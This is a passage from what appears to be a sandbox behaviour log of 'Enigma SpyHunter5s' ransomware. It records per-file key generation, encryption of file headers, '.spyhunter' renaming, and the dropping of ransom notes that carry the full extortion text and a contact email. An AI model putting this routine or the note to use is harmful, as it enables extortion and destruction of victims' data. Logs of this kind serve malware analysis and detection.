HALPmcxz\\Videos\\n2-si\\mgNZKVhmEg.mkv.spyhunter") returned 71 [0147.472] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\mgNZKVhmEg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\mgnzkvhmeg.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\mgNZKVhmEg.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\mgnzkvhmeg.mkv.spyhunter")) returned 1 [0147.473] GetProcessHeap () returned 0x2c0000 [0147.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.473] GetProcessHeap () returned 0x2c0000 [0147.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.473] GetProcessHeap () returned 0x2c0000 [0147.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f728 | out: hHeap=0x2c0000) returned 1 [0147.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.474] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.474] WriteFile (in: hFile=0xa0, lpBuffer=0x248ef6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f098, lpOverlapped=0x0 | out: lpBuffer=0x248ef6f*, lpNumberOfBytesWritten=0x248f098*=0x127, lpOverlapped=0x0) returned 1 [0147.475] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.475] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f098, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f098*=0x2ac, lpOverlapped=0x0) returned 1 [0147.475] CloseHandle (hObject=0xa0) returned 1 [0147.475] GetProcessHeap () returned 0x2c0000 [0147.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fde0 | out: hHeap=0x2c0000) returned 1 [0147.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f038 | out: pbBuffer=0x248f038) returned 1 [0147.476] GetProcessHeap () returned 0x2c0000 [0147.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.476] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f030*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f030*=0x30) returned 1 [0147.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\V hdX_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\v hdx_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\V hdX_.swf") returned 71 [0147.476] StrStrW (lpFirst="V hdX_.swf", lpSrch=".txt") returned 0x0 [0147.476] GetProcessHeap () returned 0x2c0000 [0147.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.477] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eff4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eff4*=0x2800, lpOverlapped=0x0) returned 1 [0147.477] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.477] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eff4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eff4*=0x2800, lpOverlapped=0x0) returned 1 [0147.478] GetProcessHeap () returned 0x2c0000 [0147.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.478] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.478] WriteFile (in: hFile=0xa0, lpBuffer=0x248f034*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eff4, lpOverlapped=0x0 | out: lpBuffer=0x248f034*, lpNumberOfBytesWritten=0x248eff4*=0x4, lpOverlapped=0x0) returned 1 [0147.478] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eff4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eff4*=0x30, lpOverlapped=0x0) returned 1 [0147.478] CloseHandle (hObject=0xa0) returned 1 [0147.478] GetProcessHeap () returned 0x2c0000 [0147.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.478] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\V hdX_.swf.spyhunter") returned 81 [0147.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\V hdX_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\v hdx_.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\V hdX_.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\v hdx_.swf.spyhunter")) returned 1 [0147.479] GetProcessHeap () returned 0x2c0000 [0147.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.479] GetProcessHeap () returned 0x2c0000 [0147.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.479] GetProcessHeap () returned 0x2c0000 [0147.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee4d0 | out: hHeap=0x2c0000) returned 1 [0147.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\pJMVe5TY\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\pjmve5ty\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.760] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.761] WriteFile (in: hFile=0x178, lpBuffer=0x248ef67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f090, lpOverlapped=0x0 | out: lpBuffer=0x248ef67*, lpNumberOfBytesWritten=0x248f090*=0x127, lpOverlapped=0x0) returned 1 [0147.761] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.761] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f090, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f090*=0x2ac, lpOverlapped=0x0) returned 1 [0147.762] CloseHandle (hObject=0x178) returned 1 [0147.860] GetProcessHeap () returned 0x2c0000 [0147.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f399e8 | out: hHeap=0x2c0000) returned 1 [0147.860] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f030 | out: pbBuffer=0x248f030) returned 1 [0147.861] GetProcessHeap () returned 0x2c0000 [0147.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f028*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f028*=0x30) returned 1 [0147.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.861] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0147.861] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0147.861] GetProcessHeap () returned 0x2c0000 [0147.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.861] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efec*=0x1f8, lpOverlapped=0x0) returned 1 [0147.862] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.862] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x248efec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efec*=0x1f8, lpOverlapped=0x0) returned 1 [0147.862] GetProcessHeap () returned 0x2c0000 [0147.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.862] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.862] WriteFile (in: hFile=0x9c, lpBuffer=0x248f02c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efec, lpOverlapped=0x0 | out: lpBuffer=0x248f02c*, lpNumberOfBytesWritten=0x248efec*=0x4, lpOverlapped=0x0) returned 1 [0147.862] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efec*=0x30, lpOverlapped=0x0) returned 1 [0147.862] CloseHandle (hObject=0x9c) returned 1 [0147.977] GetProcessHeap () returned 0x2c0000 [0147.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.978] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.spyhunter") returned 61 [0147.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.spyhunter")) returned 1 [0147.979] GetProcessHeap () returned 0x2c0000 [0147.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.979] GetProcessHeap () returned 0x2c0000 [0147.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.979] GetProcessHeap () returned 0x2c0000 [0147.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf640 | out: hHeap=0x2c0000) returned 1 [0147.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.980] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.980] WriteFile (in: hFile=0xa0, lpBuffer=0x248ef5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f088, lpOverlapped=0x0 | out: lpBuffer=0x248ef5f*, lpNumberOfBytesWritten=0x248f088*=0x127, lpOverlapped=0x0) returned 1 [0147.980] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.980] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f088, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f088*=0x2ac, lpOverlapped=0x0) returned 1 [0147.981] CloseHandle (hObject=0xa0) returned 1 [0147.981] GetProcessHeap () returned 0x2c0000 [0147.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f1b0 | out: hHeap=0x2c0000) returned 1 [0147.981] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f028 | out: pbBuffer=0x248f028) returned 1 [0147.981] GetProcessHeap () returned 0x2c0000 [0147.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.981] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f020*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f020*=0x30) returned 1 [0147.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\_74KC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\_74kc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\_74KC.wav") returned 56 [0147.982] StrStrW (lpFirst="_74KC.wav", lpSrch=".txt") returned 0x0 [0147.982] GetProcessHeap () returned 0x2c0000 [0147.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.982] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efe4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efe4*=0x2800, lpOverlapped=0x0) returned 1 [0147.983] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.983] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efe4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efe4*=0x2800, lpOverlapped=0x0) returned 1 [0147.984] GetProcessHeap () returned 0x2c0000 [0147.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.984] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.984] WriteFile (in: hFile=0xa0, lpBuffer=0x248f024*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efe4, lpOverlapped=0x0 | out: lpBuffer=0x248f024*, lpNumberOfBytesWritten=0x248efe4*=0x4, lpOverlapped=0x0) returned 1 [0147.984] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efe4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efe4*=0x30, lpOverlapped=0x0) returned 1 [0147.984] CloseHandle (hObject=0xa0) returned 1 [0147.984] GetProcessHeap () returned 0x2c0000 [0147.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.984] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\_74KC.wav.spyhunter") returned 66 [0147.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\_74KC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\_74kc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\_74KC.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\_74kc.wav.spyhunter")) returned 1 [0147.985] GetProcessHeap () returned 0x2c0000 [0147.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.985] GetProcessHeap () returned 0x2c0000 [0147.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.985] GetProcessHeap () returned 0x2c0000 [0147.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2dc38 | out: hHeap=0x2c0000) returned 1 [0147.985] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f020 | out: pbBuffer=0x248f020) returned 1 [0147.985] GetProcessHeap () returned 0x2c0000 [0147.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.985] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f018*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f018*=0x30) returned 1 [0147.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\ypt0vMz2 _Rq9k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ypt0vmz2 _rq9k.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.985] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\ypt0vMz2 _Rq9k.mp3") returned 65 [0147.985] StrStrW (lpFirst="ypt0vMz2 _Rq9k.mp3", lpSrch=".txt") returned 0x0 [0147.985] GetProcessHeap () returned 0x2c0000 [0147.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.985] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efdc*=0x2800, lpOverlapped=0x0) returned 1 [0147.986] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.986] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efdc*=0x2800, lpOverlapped=0x0) returned 1 [0147.986] GetProcessHeap () returned 0x2c0000 [0147.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.986] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.987] WriteFile (in: hFile=0xa0, lpBuffer=0x248f01c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x248f01c*, lpNumberOfBytesWritten=0x248efdc*=0x4, lpOverlapped=0x0) returned 1 [0147.987] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efdc*=0x30, lpOverlapped=0x0) returned 1 [0147.987] CloseHandle (hObject=0xa0) returned 1 [0147.987] GetProcessHeap () returned 0x2c0000 [0147.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.987] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\ypt0vMz2 _Rq9k.mp3.spyhunter") returned 75 [0147.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\ypt0vMz2 _Rq9k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ypt0vmz2 _rq9k.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\ypt0vMz2 _Rq9k.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\ypt0vmz2 _rq9k.mp3.spyhunter")) returned 1 [0147.987] GetProcessHeap () returned 0x2c0000 [0147.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.988] GetProcessHeap () returned 0x2c0000 [0147.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.988] GetProcessHeap () returned 0x2c0000 [0147.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef61e8 | out: hHeap=0x2c0000) returned 1 [0147.988] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f020 | out: pbBuffer=0x248f020) returned 1 [0147.988] GetProcessHeap () returned 0x2c0000 [0147.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.988] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f018*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f018*=0x30) returned 1 [0147.988] CreateFileW 